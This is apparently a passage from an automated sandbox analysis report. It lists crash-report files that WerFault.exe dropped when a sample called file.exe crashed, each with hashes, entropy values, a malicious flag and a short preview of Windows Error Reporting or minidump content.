                                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.0.9.3.1.7.1.7.0.9.4.1.1.9.5.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.2.0.a.7.2.2.b.-.0.8.c.f.-.4.c.c.4.-.8.a.c.0.-.2.8.0.6.1.f.5.7.1.0.4.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.a.c.3.4.1.f.6.-.9.b.f.c.-.4.6.7.c.-.b.1.2.1.-.f.9.4.9.f.b.1.5.e.f.b.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.0.4.-.0.0.0.1.-.0.0.1.f.-.a.0.7.e.-.1.8.b.7.8.8.d.7.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.6.5.3.d.e.e.c.5.b.c.5.a.9.c.c.9.7.3.9.f.2.5.f.4.c.2.c.d.7.5.a.0.0.0.0.f.f.f.f.!.0.0.0.0.3.a.e.b.f.e.c.7.9.8.0.d.1.d.b.1.e.d.b.e.c.c.b.b.2.9.0.4.4.e.a.6.7.7.b.e.3.0.4.b.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.2././.0.9././.1.9.:.1.5.:.0.2.:.4.3.!.0.!.f.i.l.e...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.e.r.v.i.c.e.
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):65536
                                                          Entropy (8bit):0.8590430290576522
                                                          Encrypted:false
                                                          SSDEEP:192:ZVCfavHzH56rfI3jDm/u7shS274ItmFBx:DT56rojC/u7shX4ItU
                                                          MD5:F3F36BBB55F6E790A86DBA1F15B9A00B
                                                          SHA1:49AC90E23C1F9D8B0F6CD11D9FC4CD0F66F44466
                                                          SHA-256:4BA7004A41F766ABFA91086987DBA184975D827A94DDCE79BBC1FB214169FFD5
                                                          SHA-512:7885223897D83B09CFEF4DD680F8E6E2565C72F422F1D04F0ADF38D7F98CEFD52E6DB14D01C6B56141F1C5DBC88D1599DDA261B7522DDD535C438557DA95B6BB
                                                          Malicious:true
                                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.0.9.3.1.7.1.4.2.8.2.4.9.5.2.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.d.9.5.3.a.7.1.-.3.6.2.1.-.4.e.6.9.-.8.b.4.d.-.2.4.5.9.1.4.4.6.7.8.6.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.6.2.6.7.e.b.0.-.8.0.5.0.-.4.0.8.f.-.9.c.5.8.-.d.9.0.6.9.f.4.7.6.7.4.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.0.4.-.0.0.0.1.-.0.0.1.f.-.a.0.7.e.-.1.8.b.7.8.8.d.7.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.6.5.3.d.e.e.c.5.b.c.5.a.9.c.c.9.7.3.9.f.2.5.f.4.c.2.c.d.7.5.a.0.0.0.0.f.f.f.f.!.0.0.0.0.3.a.e.b.f.e.c.7.9.8.0.d.1.d.b.1.e.d.b.e.c.c.b.b.2.9.0.4.4.e.a.6.7.7.b.e.3.0.4.b.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.2././.0.9././.1.9.:.1.5.:.0.2.:.4.3.!.0.!.f.i.l.e...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.e.r.v.i.c.e.
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):65536
                                                          Entropy (8bit):0.8787028216016062
                                                          Encrypted:false
                                                          SSDEEP:192:m4VCfavuzH56rfI3jDym/u7shS274ItmFBx:/E56rojJ/u7shX4ItU
                                                          MD5:F90783CAE54A721754D4F10AADB5ACBA
                                                          SHA1:ADBFD87A7D89F88513561BEA08B3371E5EF530AC
                                                          SHA-256:F257E6F28AA994BDC0B69B789D2FEE724C6089019B53624E1C74266DF8663BCA
                                                          SHA-512:4F0C4081AAA5CCD1C5985DCB1DCFE7E30AF9E19C0F8E5F2992F9B04CBB6677795ABBC91E185FBC6C218A87F510D40E3E4E3E4B04E2354AE6DACDF187F30278C1
                                                          Malicious:true
                                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.0.9.3.1.7.1.4.5.9.8.7.3.6.0.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.a.c.1.7.b.5.e.-.6.3.4.8.-.4.8.2.0.-.8.8.5.7.-.2.8.4.5.5.d.8.7.f.e.9.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.0.3.0.3.4.e.2.-.6.0.3.0.-.4.8.d.9.-.a.f.9.7.-.a.b.0.f.b.1.a.9.5.5.e.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.0.4.-.0.0.0.1.-.0.0.1.f.-.a.0.7.e.-.1.8.b.7.8.8.d.7.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.6.5.3.d.e.e.c.5.b.c.5.a.9.c.c.9.7.3.9.f.2.5.f.4.c.2.c.d.7.5.a.0.0.0.0.f.f.f.f.!.0.0.0.0.3.a.e.b.f.e.c.7.9.8.0.d.1.d.b.1.e.d.b.e.c.c.b.b.2.9.0.4.4.e.a.6.7.7.b.e.3.0.4.b.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.2././.0.9././.1.9.:.1.5.:.0.2.:.4.3.!.0.!.f.i.l.e...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.e.r.v.i.c.e.
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):65536
                                                          Entropy (8bit):0.8358188215804623
                                                          Encrypted:false
                                                          SSDEEP:192:CVCfavUzH56rfI3jDB/u7sGS274ItmFBx:ei56rojl/u7sGX4ItU
                                                          MD5:8A9E5C963519858FE9A11A13F26E714A
                                                          SHA1:A0221695263B3BE0CD6A3474E5F747983851E278
                                                          SHA-256:5BF7D4DF1698DD1B6A0081B38BBC8502A87DF63DCBB0A276AF213AC3E372A650
                                                          SHA-512:C384DA290D76285B1B21F5CCDAF65AA8655433ECE564F6606E0D8EED26BB6262E4F0F73A74E349A335293D764FC5EEBAC49C6AB0CFDAF93A4DCED7DE28DCB585
                                                          Malicious:true
                                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.0.9.3.1.7.1.2.7.6.0.9.7.2.0.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.f.d.f.e.4.7.5.-.1.1.c.d.-.4.2.f.2.-.a.f.8.e.-.7.8.5.7.5.6.5.8.6.5.a.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.b.8.e.a.4.5.2.-.6.b.1.0.-.4.5.6.8.-.8.b.f.e.-.e.1.e.2.5.8.5.7.8.a.3.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.0.4.-.0.0.0.1.-.0.0.1.f.-.a.0.7.e.-.1.8.b.7.8.8.d.7.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.6.5.3.d.e.e.c.5.b.c.5.a.9.c.c.9.7.3.9.f.2.5.f.4.c.2.c.d.7.5.a.0.0.0.0.f.f.f.f.!.0.0.0.0.3.a.e.b.f.e.c.7.9.8.0.d.1.d.b.1.e.d.b.e.c.c.b.b.2.9.0.4.4.e.a.6.7.7.b.e.3.0.4.b.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.2././.0.9././.1.9.:.1.5.:.0.2.:.4.3.!.0.!.f.i.l.e...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.e.r.v.i.c.e.
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):65536
                                                          Entropy (8bit):0.8356682104401857
                                                          Encrypted:false
                                                          SSDEEP:192:Z5VCfav6zH56rfI3jDB/u7sGS274ItmFBx:dA56rojl/u7sGX4ItU
                                                          MD5:76A796C2F3296468940F32C2F35F290B
                                                          SHA1:21307E70E4EABFE4DFAE85644A78512E7B4D1077
                                                          SHA-256:46A9C4967C63201820BCB10FE5AF42D0ABB56CF60B59F9927806189966ECB3CA
                                                          SHA-512:3FDD338CFB28F03B8AE400E9777357C7E9158001970FA062C128CC6866809760C81E6F80A4FE77278856C535242A2B03A6CFE217618BA72046F55E72590BD5A5
                                                          Malicious:true
                                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.0.9.3.1.7.1.2.9.8.1.8.2.9.1.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.f.8.e.5.8.8.4.-.f.0.c.2.-.4.1.7.6.-.8.4.f.5.-.7.8.a.d.8.1.b.9.5.c.d.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.b.2.0.5.0.0.d.-.5.c.f.c.-.4.3.e.c.-.a.4.9.5.-.b.f.4.f.b.d.b.7.1.b.4.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.0.4.-.0.0.0.1.-.0.0.1.f.-.a.0.7.e.-.1.8.b.7.8.8.d.7.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.6.5.3.d.e.e.c.5.b.c.5.a.9.c.c.9.7.3.9.f.2.5.f.4.c.2.c.d.7.5.a.0.0.0.0.f.f.f.f.!.0.0.0.0.3.a.e.b.f.e.c.7.9.8.0.d.1.d.b.1.e.d.b.e.c.c.b.b.2.9.0.4.4.e.a.6.7.7.b.e.3.0.4.b.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.2././.0.9././.1.9.:.1.5.:.0.2.:.4.3.!.0.!.f.i.l.e...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.e.r.v.i.c.e.
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):65536
                                                          Entropy (8bit):0.8358981846766972
                                                          Encrypted:false
                                                          SSDEEP:192:hkVCfavhzH56rfI3jDB/u7sGS274ItmFBx:y156rojl/u7sGX4ItU
                                                          MD5:3DB8FE3AF6AB3B151DA2FF2464C75598
                                                          SHA1:E53BF3BB43AEEA6A1B0B36C3D4BFD0595F120EBF
                                                          SHA-256:2E590CB8B33552CEA3EFCB52E3754187B952FEF69236E7ADEF1984F47563A9D3
                                                          SHA-512:2915C2836B29082D95BA509A08AF72A38FDCDD5D41A528A998CDC35846F0E1FD80C82FF48274187B121E5C72BA9C7713F07A84A00B318A4C5FBC14EA8EF91999
                                                          Malicious:true
                                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.0.9.3.1.7.1.3.2.8.5.0.8.6.5.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.a.3.e.a.1.5.f.-.8.0.4.4.-.4.0.a.3.-.9.d.3.0.-.5.0.6.5.3.5.d.9.2.2.a.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.a.6.8.d.d.c.f.-.9.a.4.a.-.4.a.c.d.-.8.a.7.d.-.5.4.2.f.8.9.e.d.4.b.1.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.0.4.-.0.0.0.1.-.0.0.1.f.-.a.0.7.e.-.1.8.b.7.8.8.d.7.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.6.5.3.d.e.e.c.5.b.c.5.a.9.c.c.9.7.3.9.f.2.5.f.4.c.2.c.d.7.5.a.0.0.0.0.f.f.f.f.!.0.0.0.0.3.a.e.b.f.e.c.7.9.8.0.d.1.d.b.1.e.d.b.e.c.c.b.b.2.9.0.4.4.e.a.6.7.7.b.e.3.0.4.b.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.2././.0.9././.1.9.:.1.5.:.0.2.:.4.3.!.0.!.f.i.l.e...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.e.r.v.i.c.e.
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):65536
                                                          Entropy (8bit):0.8921234333730086
                                                          Encrypted:false
                                                          SSDEEP:192:jErVCfavuzH56rfI3jDyH/u7shS274ItmFBx:jEpE56roj4/u7shX4ItU
                                                          MD5:1B5B1DD6F38DC79A13924EE31E530FFA
                                                          SHA1:578409C4389884037F095A9DEE9147DD7F21DCCF
                                                          SHA-256:28C9846E48651E67935DBA147B7B0A9954EB42E97521068E08DC9D01A1BF1BEE
                                                          SHA-512:A93809FD5389DA74249C77126D0D7FA4875C9B346D54C5BE4B9B1732496C0EAC23CCECC9620004A15EE83226DDAC06E17E6866FFDD5540E4BE9C404006079661
                                                          Malicious:true
                                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.0.9.3.1.7.1.4.9.4.6.3.6.0.8.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.b.2.d.b.7.7.3.-.6.e.8.6.-.4.e.0.5.-.9.6.2.e.-.7.a.b.d.a.c.d.2.8.2.e.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.a.c.b.d.b.3.d.-.f.c.b.c.-.4.c.b.7.-.9.c.b.3.-.c.d.4.7.d.a.f.e.a.0.9.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.0.4.-.0.0.0.1.-.0.0.1.f.-.a.0.7.e.-.1.8.b.7.8.8.d.7.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.6.5.3.d.e.e.c.5.b.c.5.a.9.c.c.9.7.3.9.f.2.5.f.4.c.2.c.d.7.5.a.0.0.0.0.f.f.f.f.!.0.0.0.0.3.a.e.b.f.e.c.7.9.8.0.d.1.d.b.1.e.d.b.e.c.c.b.b.2.9.0.4.4.e.a.6.7.7.b.e.3.0.4.b.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.2././.0.9././.1.9.:.1.5.:.0.2.:.4.3.!.0.!.f.i.l.e...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.e.r.v.i.c.e.
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):65536
                                                          Entropy (8bit):0.8220738451315124
                                                          Encrypted:false
                                                          SSDEEP:192:pZNVCfavtzH56rfI3jDk/u7sGS274ItmFBx:pZPx56rojg/u7sGX4ItU
                                                          MD5:A181BCB38630327512C0392B681B8817
                                                          SHA1:E14E7BD366AFD36B5EF879BFB37227733870A54B
                                                          SHA-256:3346D03DC9BAF42461F45AE80523ED776B2857EF4E9F510152B3F98968C64912
                                                          SHA-512:5B4E1294FDA5D9BC2669389DB7108FE63A201FF40BDF2F27707DD3025A68D03F8EA22422A2D530C8F16CAA262FE1D596AA8862C302EC1D146728BF97D2174F82
                                                          Malicious:true
                                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.0.9.3.1.7.1.2.4.9.3.0.9.2.2.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.c.b.4.d.0.d.2.-.2.5.e.b.-.4.e.4.b.-.a.9.7.8.-.1.4.a.b.5.1.f.a.9.7.8.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.4.5.b.9.5.1.1.-.e.e.7.3.-.4.f.1.9.-.b.a.8.5.-.4.a.9.a.3.e.b.4.7.d.5.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.0.4.-.0.0.0.1.-.0.0.1.f.-.a.0.7.e.-.1.8.b.7.8.8.d.7.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.6.5.3.d.e.e.c.5.b.c.5.a.9.c.c.9.7.3.9.f.2.5.f.4.c.2.c.d.7.5.a.0.0.0.0.f.f.f.f.!.0.0.0.0.3.a.e.b.f.e.c.7.9.8.0.d.1.d.b.1.e.d.b.e.c.c.b.b.2.9.0.4.4.e.a.6.7.7.b.e.3.0.4.b.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.2././.0.9././.1.9.:.1.5.:.0.2.:.4.3.!.0.!.f.i.l.e...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.e.r.v.i.c.e.
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):65536
                                                          Entropy (8bit):0.8358726160645562
                                                          Encrypted:false
                                                          SSDEEP:192:TVCfavQzH56rfI3jDB/u7sGS274ItmFBx:xe56rojl/u7sGX4ItU
                                                          MD5:7DB187678B90E69F643A256C73D8FB98
                                                          SHA1:39DCC475A02696D724E826957DC62EFE486DAD30
                                                          SHA-256:7EEE436EA17E5F6D286FF2279DC7ABAE5E12721FD46C37A45AE2EB3F3108F1E5
                                                          SHA-512:55E7909344B995867050E64701CAB51DAA9BAEA0BB0F73D11ACC31B04C013A73B0B7BDC5120D41BDB771D6DBA3AE0C0B5ADABC4E58695CB1751268010AA02A81
                                                          Malicious:true
                                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.0.9.3.1.7.1.3.9.7.1.4.6.8.2.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.a.8.3.5.8.3.4.-.b.f.b.c.-.4.3.0.1.-.9.b.4.2.-.5.2.9.8.3.5.3.f.6.f.6.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.6.b.e.d.0.d.b.-.8.e.5.f.-.4.8.b.8.-.8.d.4.9.-.1.0.5.e.1.0.7.0.e.5.7.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.0.4.-.0.0.0.1.-.0.0.1.f.-.a.0.7.e.-.1.8.b.7.8.8.d.7.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.6.5.3.d.e.e.c.5.b.c.5.a.9.c.c.9.7.3.9.f.2.5.f.4.c.2.c.d.7.5.a.0.0.0.0.f.f.f.f.!.0.0.0.0.3.a.e.b.f.e.c.7.9.8.0.d.1.d.b.1.e.d.b.e.c.c.b.b.2.9.0.4.4.e.a.6.7.7.b.e.3.0.4.b.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.2././.0.9././.1.9.:.1.5.:.0.2.:.4.3.!.0.!.f.i.l.e...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.e.r.v.i.c.e.
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:Mini DuMP crash report, 14 streams, Tue Oct 4 00:32:51 2022, 0x1205a4 type
                                                          Category:dropped
                                                          Size (bytes):116820
                                                          Entropy (8bit):2.162723789176737
                                                          Encrypted:false
                                                          SSDEEP:768:wOGPMXXKWPMZGelnY29d1TBuFXMyU+VGAHIPlnS8:hXXKWPMZGe5Y29XTBuFXRVGAoPl9
                                                          MD5:7B8E0CF31A1D83FCE1AD7703BC66326B
                                                          SHA1:A8EC8B6D9EA928F15DA63334290FF7ED191D1EDA
                                                          SHA-256:1E4805447347214F5EDE9E9B8B34E023B0723E7E1340EC6A1C7361FD4A4E409A
                                                          SHA-512:1632D2DD884238857A89DB3B119E2DF9411D84C5271228E7289038D710234019C5138FB2C377C2871A4BDCCEAB5E312701DF75944CE7743FA1CDBA34F92D522D
                                                          Malicious:false
                                                          Preview:MDMP....... .......3.;c............D...............L.......d...rI..........T.......8...........T...........82..............$................................................................................U...........B..............GenuineIntelW...........T............~;c.............................0..2...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):8342
                                                          Entropy (8bit):3.700989303638173
                                                          Encrypted:false
                                                          SSDEEP:192:Rrl7r3GLNi6C+6ZpZX6YqeSUGx+gmfB0SeBCpB2f89bLEsfJZm:RrlsNig6ZnX6YjSUu+gmfOSVL3fG
                                                          MD5:CC20ADE9E9BD1A3774B210796DC997D5
                                                          SHA1:CDC7E9842A42888C2CBC3FB0878B066862DB218E
                                                          SHA-256:AF2685AA560EDF48A470DF7A0D28AF60271EC6DEB686B5E151E45B74A3D177E2
                                                          SHA-512:688755D0C96E42923F61FFE1B6A24CF1ECED24010EC8361E101914B45F59349C1C59CB10461E55BCB1AD4FAB68E28DD5026463EE65FAF0DAE194BF0DEB31F35E
                                                          Malicious:false
                                                          Preview:<?xml version="1.0" encoding="UTF-16"?> <WERReportMetadata> <OSVersionInformation> <WindowsNTVersion>10.0</WindowsNTVersion> <Build>17134</Build> <Product>(0x30): Windows 10 Pro</Product> <Edition>Professional</Edition> <BuildString>17134.1.amd64fre.rs4_release.180410-1804</BuildString> <Revision>1</Revision> <Flavor>Multiprocessor Free</Flavor> <Architecture>X64</Architecture> <LCID>1033</LCID> </OSVersionInformation> <ProcessInformation> <Pid>5380</Pid> ...
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):4573
                                                          Entropy (8bit):4.47248095416639
                                                          Encrypted:false
                                                          SSDEEP:48:cvIwSD8zsKJgtWI9UqrWgc8sqYj/8fm8M4JbUZFIK+q86mYrZMjT4d:uITfYvqagrsqY4JwMK6YrZMX4d
                                                          MD5:F11AB740C2425A44E7801C6CBC141A3D
                                                          SHA1:4D38F93016F908EF4EF5F0055511620EE393B763
                                                          SHA-256:DB78236DD556454B1FDD6978367FF1D1F3B2886CA83ED5927381F935AF69CCDC
                                                          SHA-512:08D2D74ABD11A39D54E6B436C1D2D8C81CA9AE1958153C481FF281F9D6402D7EA07969203C8F601DA9D06C0503EA64810646FC28021715C9F609DF208EB48B65
                                                          Malicious:false
                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1719943" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:Mini DuMP crash report, 14 streams, Tue Oct 4 00:32:05 2022, 0x1205a4 type
                                                          Category:dropped
                                                          Size (bytes):50950
                                                          Entropy (8bit):2.270123045328824
                                                          Encrypted:false
                                                          SSDEEP:192:rVuX2UmxwtOPolF+4n72zkA8taYKciSgyf97wtWb1oNGELAUV27Gv4Vms6LLoA+S:9xnPQHnuhWf/qN9kk27Gkm/z
                                                          MD5:27801B40096192ED17A6D203766DC54D
                                                          SHA1:A100C0A471F04F07447CD50028D37D878044B2A8
                                                          SHA-256:553A7B782630C5BB578C6352CC044C44D6680E4DB37FB7AB946FEDB69D162E4D
                                                          SHA-512:2E852AD0C16AB333C667E3788DA23F2F51B4DCE8F7A778C891A202B3904D9EFB864235CC4B24698AB294B0285968906E51C61A78BBEB067AF3A838B09DF73D93
                                                          Malicious:false
                                                          Preview:MDMP (minidump; non-printable bytes omitted) ... GenuineIntel ... Pacific Standard Time ... Pacific Daylight Time ... 17134.1.x86fre.rs4_release.180410-1804
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):8308
                                                          Entropy (8bit):3.7002240972170037
                                                          Encrypted:false
                                                          SSDEEP:192:Rrl7r3GLNi6Cz63g6YqzSUvggmfB0SeBCpBRg89bREsf0OTbm:RrlsNi96w6Y+SUvggmfOSddR3fTO
